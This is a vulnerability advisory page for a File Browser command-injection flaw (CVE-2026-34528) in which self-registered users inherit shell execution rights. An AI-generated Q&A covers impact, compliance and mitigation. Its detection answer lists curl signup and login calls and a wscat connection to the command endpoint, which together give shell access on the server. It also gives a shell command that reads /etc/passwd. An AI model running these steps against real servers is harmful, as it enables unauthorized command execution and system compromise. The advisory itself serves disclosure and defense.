CVE-2026-34528
Command Injection via Improper Permission Handling in File Browser
Publication date: 2026-04-01
Last updated on: 2026-04-06
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| filebrowser | filebrowser | to 2.62.2 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-269 | The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. |
Attack-Flow Graph
AI Powered Q&A
How can this vulnerability impact me? :
This vulnerability allows unauthenticated users to gain shell execution capabilities on the server by self-registering. This means attackers can run arbitrary commands on the server, potentially leading to full system compromise, data theft, data loss, or disruption of services.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability allows unauthenticated users who self-register to inherit shell execution capabilities and run arbitrary commands on the server. Such unauthorized access and control over server operations can lead to data breaches, unauthorized data manipulation, and potential exposure of sensitive information.
Consequently, this could impact compliance with common standards and regulations like GDPR and HIPAA, which require strict controls over data access, integrity, and confidentiality. The ability for unauthorized users to execute commands on the server may violate these requirements by compromising data security and privacy.
The issue has been patched in version 2.62.2, so updating to this version or later is critical to maintaining compliance.
Can you explain this vulnerability to me?
This vulnerability exists in File Browser versions prior to 2.62.2. The signupHandler applies default user permissions but only removes the Admin permission. It does not remove the Execute permission or the Commands list from the default user template. As a result, if an administrator enables signup, server-side execution, and sets Execute=true in the default user template, any unauthenticated user who self-registers gains shell execution capabilities and can run arbitrary commands on the server.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade File Browser to version 2.62.2 or later, where the issue has been patched.
Additionally, review and adjust the default user template permissions, especially the Execute permission and Commands list, to ensure that unauthenticated users cannot inherit shell execution capabilities.
If signup is enabled, consider disabling it temporarily until the patch is applied.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by checking if the File Browser instance allows unauthenticated users to self-register and inherit Execute permissions along with a Commands list from the default user template.
One way to detect the vulnerability is to attempt self-registration via the signup API and inspect the resulting JWT token for Execute permissions.
Example commands to test the vulnerability include:
- Use curl to self-register a new user: curl -X POST -d '{"username":"testuser","password":"testpass"}' https://<filebrowser-server>/api/signup
- Login with the new user to receive a JWT token: curl -X POST -d '{"username":"testuser","password":"testpass"}' https://<filebrowser-server>/api/login
- Inspect the JWT token payload to check if the Execute permission is present.
- Use a WebSocket client (e.g., wscat) to connect to the command execution endpoint and attempt to run commands: wscat -c wss://<filebrowser-server>/api/command/
- Send commands such as: bash -c 'id && hostname && cat /etc/passwd | head -3' to verify if arbitrary command execution is possible.